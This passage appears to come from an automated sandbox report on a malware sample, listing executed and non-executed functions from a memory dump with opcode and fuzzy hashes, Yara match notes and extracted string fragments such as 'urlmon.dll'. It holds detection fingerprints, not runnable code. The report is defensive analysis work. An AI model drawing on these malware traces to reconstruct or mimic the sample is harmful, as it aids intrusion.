                                                      • Opcode Fuzzy Hash: a35b7892066766386da6d5e5bc71a5f1869d27b51a8e5bb8d4689a4c74f53aac
                                                      • Instruction Fuzzy Hash: BB119071604348ABD720EBA9DD45FEF77ACEF84310F008549F959A7280D7746A11CFA1
                                                      Function 05A65252 Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cabeeb3617f9d06f941541c42f8e280ac343f226026913fce090c60013b4265c
                                                      • Instruction ID: 7edce3083daa82a62f106b4fda948af4742a9b661f519c5a048f3af382e7a4e2
                                                      • Opcode Fuzzy Hash: cabeeb3617f9d06f941541c42f8e280ac343f226026913fce090c60013b4265c
                                                      • Instruction Fuzzy Hash: 8A2121B6D01218AF9B00DFE9D9419EFBBF9EF88200F04415AE919E7204E7705A00CBE0
                                                      Function 05A69532 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56a61c51a895dbc6affd52a1c766e14ac807e4eff9a711212e461f79b1ccc8aa
                                                      • Instruction ID: beea0e51e22a1ea0335e815a3d4cc84d82766a6cd8eb233267ab42730bf2739c
                                                      • Opcode Fuzzy Hash: 56a61c51a895dbc6affd52a1c766e14ac807e4eff9a711212e461f79b1ccc8aa
                                                      • Instruction Fuzzy Hash: 81018CB6214608BBCB54DE99DD81EEB77ADEFCD714F408208BA19E3240D630EC518BA5
                                                      Function 05A57E99 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab4b0856d298e4993d9173b38809a7eb0e3bf6f605e3a669d1b6638aa5591a66
                                                      • Instruction ID: 75ad9df849422680c1cf246a3e89ab6bc3d67c55de69e44bddd3a3f7bcc487e8
                                                      • Opcode Fuzzy Hash: ab4b0856d298e4993d9173b38809a7eb0e3bf6f605e3a669d1b6638aa5591a66
                                                      • Instruction Fuzzy Hash: DEF0C2B2654208BBEB04DBA0DC45FBE7BADEF44750F1481A9FD08EB281D639DA40C690
                                                      Function 05A57EDB Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a39fa96ca45536bc52b8f188e2551c8811c7f7983166c02624e1f9c7f280f55
                                                      • Instruction ID: ff08e11c79694b8b7b9320411c00428720a3257c8bd1cd35e72a2e805361c135
                                                      • Opcode Fuzzy Hash: 9a39fa96ca45536bc52b8f188e2551c8811c7f7983166c02624e1f9c7f280f55
                                                      • Instruction Fuzzy Hash: 27F0F6B1E142086EDB20DF90DD49EFEB379AB94710F10818AEC0967140E7744F86CBA5
                                                      Function 05A68772 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e6b6a94b17c02eda50ab40d42251ade846b56009d817a172cfbe659020df3f0
                                                      • Instruction ID: ed415e626615705df01e3e6d6d83948c6938613e7e8f5b5f6a042ef46861c670
                                                      • Opcode Fuzzy Hash: 7e6b6a94b17c02eda50ab40d42251ade846b56009d817a172cfbe659020df3f0
                                                      • Instruction Fuzzy Hash: 2DF01CB6200204BBD710EF99DC81EDB77ACEFC8710F008409BA19E7241D670BD118BB5
                                                      Function 05A69452 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                      • Instruction ID: 094732583d48e5248b048ac05d0b3338f17eec6b4f8b6539fe02af8e6346b0ce
                                                      • Opcode Fuzzy Hash: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                      • Instruction Fuzzy Hash: 57E092B6200214BBD610EF99DC84EDB73ACEFC8710F004408FA09A7241D630BD10CBB5
                                                      Function 05A57E42 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                      • Instruction ID: a2195c0592f727d725ffe8de945518b1f3bada224049f140e0226632dea4d977
                                                      • Opcode Fuzzy Hash: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                      • Instruction Fuzzy Hash: A8F01271915209EBDB14DF64D841FDDBBB9EB05360F104369EC259B280D6359B548781
                                                      Function 05A6B312 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b2e7f847ec2c0f99b0a67433d7a70fe634fb41d49c96003b8158b1738dea773
                                                      • Instruction ID: 2c5a3c3d717711520fb6daf3e0b65424e73df05d475bf4499825424043442178
                                                      • Opcode Fuzzy Hash: 9b2e7f847ec2c0f99b0a67433d7a70fe634fb41d49c96003b8158b1738dea773
                                                      • Instruction Fuzzy Hash: 51E04F72B4031827D22056999D09FAB779C9BC1A61F050075FF289B240E974A90142F4
                                                      Function 05A57E3F Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64288c6e26f5ec4ff7ce0468a43f7632705153302bdafd4a938fe6c01046c4be
                                                      • Instruction ID: a9ee3a6f5c7b0cd9501e9dae2560a434f6b4b6a0e4c66ac8e226e04d739fc25d
                                                      • Opcode Fuzzy Hash: 64288c6e26f5ec4ff7ce0468a43f7632705153302bdafd4a938fe6c01046c4be
                                                      • Instruction Fuzzy Hash: EEE09B75915109DBDB08CF64D981F9DBB79EB05360F10436EEC15DB340D2399B548740
                                                      Function 05A69132 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                      • Instruction ID: cccac1d676457da38b92560737d7351a67b05adeef660cc18343081be0abc982
                                                      • Opcode Fuzzy Hash: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                      • Instruction Fuzzy Hash: A8E046362002187BD620AA9ADC80F9B77ACDBC6710F008459FB09A7240C671B9118BB1

                                                      Non-executed Functions

                                                      Function 05A53BA4 Relevance: 68.9, Strings: 55, Instructions: 172COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$@@@>$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-2725001343
                                                      • Opcode ID: a0e8fed687988c6ddee26be0594cb5b3c62b3106f1288713461a49fd50040b08
                                                      • Instruction ID: dbacb5e5d548789c62c4856e84e746ded9ce8487fe096816f37f1f30113411dd
                                                      • Opcode Fuzzy Hash: a0e8fed687988c6ddee26be0594cb5b3c62b3106f1288713461a49fd50040b08
                                                      • Instruction Fuzzy Hash: 84910EF08052988ECB118F55A4607DEBF71BBD5204F1585E9C6AA7B203C3BE4E45DF90
                                                      Function 05A4A153 Relevance: 43.9, Strings: 35, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ){$-$/$1U$?b$D$E.$H$O2$SC$U$W$^$a.$c/$f?$h)$kP$m$p0$p{$s7$t$t$td$y$y $z${${*$5$8$:$?$c
                                                      • API String ID: 0-298092976
                                                      • Opcode ID: 15d45a5bb83461e833fdf257296319c21204b7ff8bb378889d6ca238b745f17c
                                                      • Instruction ID: efb23d4027b26816f10ce75ccf34ee1012193dac34c92a445ab41c9a558ca1b3
                                                      • Opcode Fuzzy Hash: 15d45a5bb83461e833fdf257296319c21204b7ff8bb378889d6ca238b745f17c
                                                      • Instruction Fuzzy Hash: C1B138B0D45669CBFB61CF91C9587DDBBB1BB05308F1085D9C1583B291CBBA0A89CF91
                                                      Function 05A62722 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                      • API String ID: 0-1002149817
                                                      • Opcode ID: 2edf9395307c9a495b755994dff0c4ef6b634e1443b507b5169f83c59ddba05d
                                                      • Instruction ID: 165a737ce28fe6bc9b9a7b07302adc4617078100c6c27d47f1edf294dcd5748b
                                                      • Opcode Fuzzy Hash: 2edf9395307c9a495b755994dff0c4ef6b634e1443b507b5169f83c59ddba05d
                                                      • Instruction Fuzzy Hash: DDC11EB1D01228AADB21DFA4CD44FEEBBB9AF54304F0085DAD54CB7241E7B54A88CF65
                                                      Function 05A43B63 Relevance: 21.3, Strings: 17, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -/OB$3/67$7R[:$BNJN$HLUH$I@[5$JMUJ$KUJB$M[S0$NUK[$OJ[6$OUOU$THNU$TNHL$TNHLUHM$UHM${
                                                      • API String ID: 0-3561598004
                                                      • Opcode ID: a05b91e632687dc20bceb56c555f430b63f10808cb5e3c7dbd072217734fb70a
                                                      • Instruction ID: ec6588fcea24169711a85efe4f7a905171f8f31dc4341084fb703fc60f7421e3
                                                      • Opcode Fuzzy Hash: a05b91e632687dc20bceb56c555f430b63f10808cb5e3c7dbd072217734fb70a
                                                      • Instruction Fuzzy Hash: 63310FB8C012589ACF20CFD599806DDFF71BB04300FA18298D56A7F208DB354A82DFA4
                                                      Function 05A5AD02 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
                                                      • Opcode ID: 31f9812ca486ce7fe6b039620f73f3f644ec847a9f82faab0e192aed5666450a
                                                      • Instruction ID: 7440769f00ed800d2757b0e19106eabcc3bc73b145f6637f2f9ce5a99db10ea7
                                                      • Opcode Fuzzy Hash: 31f9812ca486ce7fe6b039620f73f3f644ec847a9f82faab0e192aed5666450a
                                                      • Instruction Fuzzy Hash: F27132B1D1121CABDB65DFA4CD44FEEB7BCAF44700F008599E509AB140EB756B488FA1
                                                      Function 05A4E8E9 Relevance: 13.8, Strings: 11, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                      • API String ID: 0-685823316
                                                      • Opcode ID: e4eb8dc9e5c81c7c901bad658f48c334343adf6db022fab614618d4ae02d1f43
                                                      • Instruction ID: 16a5384da49ef65d7197738c6677d36c7f336f357dca769d14d7f0ee83d9a1af
                                                      • Opcode Fuzzy Hash: e4eb8dc9e5c81c7c901bad658f48c334343adf6db022fab614618d4ae02d1f43
                                                      • Instruction Fuzzy Hash: A73161B1D50208AEDF50DFE4CC48FEEBBB9BF08304F108159E618A6180DBB55A488BA5
                                                      Function 05A47582 Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $:$D$a$a$r$t$u$z
                                                      • API String ID: 0-186907745
                                                      • Opcode ID: ec9b9897f7163a701d5106b2e564a0e402b267a7bf93ad1974762814ec3f8c2d
                                                      • Instruction ID: a7430ab85f654047f18e3fa376be95544e37e65aeb34d60d9ee08516d88c1dd3
                                                      • Opcode Fuzzy Hash: ec9b9897f7163a701d5106b2e564a0e402b267a7bf93ad1974762814ec3f8c2d
                                                      • Instruction Fuzzy Hash: 5A11DB20D0C7CAD9DB12C7BC84186AEBF715F63224F0883C8D5E52A2D2D2795306CBA6
                                                      Function 05A55DEE Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$P$e$i$m$o$r$x
                                                      • API String ID: 0-620024284
                                                      • Opcode ID: bf23e1216f87e200f08eaf8ebb831cc8dc60731d7014df3265e7337b3257b76d
                                                      • Instruction ID: 6d17bac4a8b0e87bd4cfadf5d93c62bc1f24bf8f7f8fd9734fd385dc148172ba
                                                      • Opcode Fuzzy Hash: bf23e1216f87e200f08eaf8ebb831cc8dc60731d7014df3265e7337b3257b76d
                                                      • Instruction Fuzzy Hash: 844196B2900218B6DB25EFA0CD49FEE777CAF55300F008599E64DA7141EBB597498FB0
                                                      Function 05A62F82 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L$S$\$a$c$e$l
                                                      • API String ID: 0-3322591375
                                                      • Opcode ID: 19bcc4e951e5772f5930d50229d9bf60f4348b7375e7c0f8b8726fc3a4671f20
                                                      • Instruction ID: 30f3868398577f822ea9a53b6ea5fb34780b07c922e1b37aec9e27e74f3b778c
                                                      • Opcode Fuzzy Hash: 19bcc4e951e5772f5930d50229d9bf60f4348b7375e7c0f8b8726fc3a4671f20
                                                      • Instruction Fuzzy Hash: 984196B2D00218AACF10DFA4DC48FEEB7F8FF88704F01456AD919E7140E7755A498BA4
                                                      Function 05A5AABD Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: F$P$T$f$r$x
                                                      • API String ID: 0-2523166886
                                                      • Opcode ID: 3c3fd566526a92fd2bff1b4faa2b5858987c62c7b9b9b41eec45d7e0ac5e10ca
                                                      • Instruction ID: 2c30d6de9cd8127bfdfff02e19556548ce8bcdd95ea83d22ad84d99a6bb8f186
                                                      • Opcode Fuzzy Hash: 3c3fd566526a92fd2bff1b4faa2b5858987c62c7b9b9b41eec45d7e0ac5e10ca
                                                      • Instruction Fuzzy Hash: 6951D371A00704ABE734DFB4CD48FEBB7B8BF04715F04465AE91996180E7B4A984CBA1
                                                      Function 05A5A79A Relevance: 6.5, Strings: 5, Instructions: 240COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $T&>A$e$h$o
                                                      • API String ID: 0-3994059736
                                                      • Opcode ID: 125d89abd965c2c98acac57425acf91f9a6d0bb9cbdfe9b9eb11007d4a71eca9
                                                      • Instruction ID: d817471c37fd9a1a6f83dd559d34ee2e8979adfba5029c78a4528a6916df2e28
                                                      • Opcode Fuzzy Hash: 125d89abd965c2c98acac57425acf91f9a6d0bb9cbdfe9b9eb11007d4a71eca9
                                                      • Instruction Fuzzy Hash: 938165B2D012186ADB25DBA0CD89FFE737CFF48700F44859EE609A6040EB745B858FA1
                                                      Function 05A5A7A2 Relevance: 6.4, Strings: 5, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $T&>A$e$h$o
                                                      • API String ID: 0-3994059736
                                                      • Opcode ID: 49cb013864f90fb688126a6d3bd570505811592e06e67d484aa90b4e2445d929
                                                      • Instruction ID: 51fe93a7ffe9a3f68bc0fe382e6ab91395824b01b69b490e2f940b15a10be7d0
                                                      • Opcode Fuzzy Hash: 49cb013864f90fb688126a6d3bd570505811592e06e67d484aa90b4e2445d929
                                                      • Instruction Fuzzy Hash: 384134B1D0121CAADB14DBA4CD49FEE73B8EF48700F40859AE50DB7140EB745B848FA5
                                                      Function 05A59E6F Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 31c28bb66233cbb4b922df6ff6b371e5dab3dd13a4c1d1567002b2aad9a613ab
                                                      • Instruction ID: 41eea6ee78b820197966db73c47f3131b84e128a5a239d28844e170b75b6efa3
                                                      • Opcode Fuzzy Hash: 31c28bb66233cbb4b922df6ff6b371e5dab3dd13a4c1d1567002b2aad9a613ab
                                                      • Instruction Fuzzy Hash: 28B12EB5A00308AFDB14DBA4CD84FEFB7F9BF88710F108558FA5997240D675AA41CB50
                                                      Function 05A59E72 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 9bc55577fe0098d8e862b2dd9f1b46922e35bdb03926d66b67aac0e1a8a92855
                                                      • Instruction ID: dab2413ea4097e1f3552b3b660fc7615359c1c8e61bb0eba0d7f5d62a90487b5
                                                      • Opcode Fuzzy Hash: 9bc55577fe0098d8e862b2dd9f1b46922e35bdb03926d66b67aac0e1a8a92855
                                                      • Instruction Fuzzy Hash: F7610BB5A00308AFDB54DFA4CC84FEFB7BDAF88714F108558E6599B244D771AA41CB60
                                                      Function 05A59D2F Relevance: 5.1, Strings: 4, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 293888d9daf7b28e8e53f48785c6079b6609b0d6e8d7dc66e1690066b3604795
                                                      • Instruction ID: ed4c0078e21da74fc4f9653194261576a8a2a0ea7fe0789e260c675f7d7de42c
                                                      • Opcode Fuzzy Hash: 293888d9daf7b28e8e53f48785c6079b6609b0d6e8d7dc66e1690066b3604795
                                                      • Instruction Fuzzy Hash: 17413CB1A11118BAEB01EB94CD46FFF7B7CAF55704F004149FA05AA180DB756B0587B6
                                                      Function 05A59D32 Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 939cbb5074fc8eb57812949b050735189ade49cc3d405b7702ff03bad3a3b0ce
                                                      • Instruction ID: 56ab755cdc638859a95738a244018726fdbde4a3cdaefccd9cfa5034d0e62487
                                                      • Opcode Fuzzy Hash: 939cbb5074fc8eb57812949b050735189ade49cc3d405b7702ff03bad3a3b0ce
                                                      • Instruction Fuzzy Hash: 20314CB1A11218BBEB01EB94CD46FEF7B7CAF55704F004049FA05AA180EB75AB0587F6
                                                      Function 05A55FD2 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4$6$8$A
                                                      • API String ID: 0-2248624344
                                                      • Opcode ID: 54689a7d453c31f9c1a8d49184d9ad5117e9d9abb6d5444043b3a610d0a1d386
                                                      • Instruction ID: d3934009bd957c4ac8204050c0e43c8c929b99003715613259aa7425943f624c
                                                      • Opcode Fuzzy Hash: 54689a7d453c31f9c1a8d49184d9ad5117e9d9abb6d5444043b3a610d0a1d386
                                                      • Instruction Fuzzy Hash: 453141B1A10209BBDB14DFA4CD45FEE77B8EF48304F008159E904A7240EB75AA458BE5

                                                      Execution Graph

                                                      Execution Coverage:2.7%
                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                      Signature Coverage:2.2%
                                                      Total number of Nodes:464
                                                      Total number of Limit Nodes:74
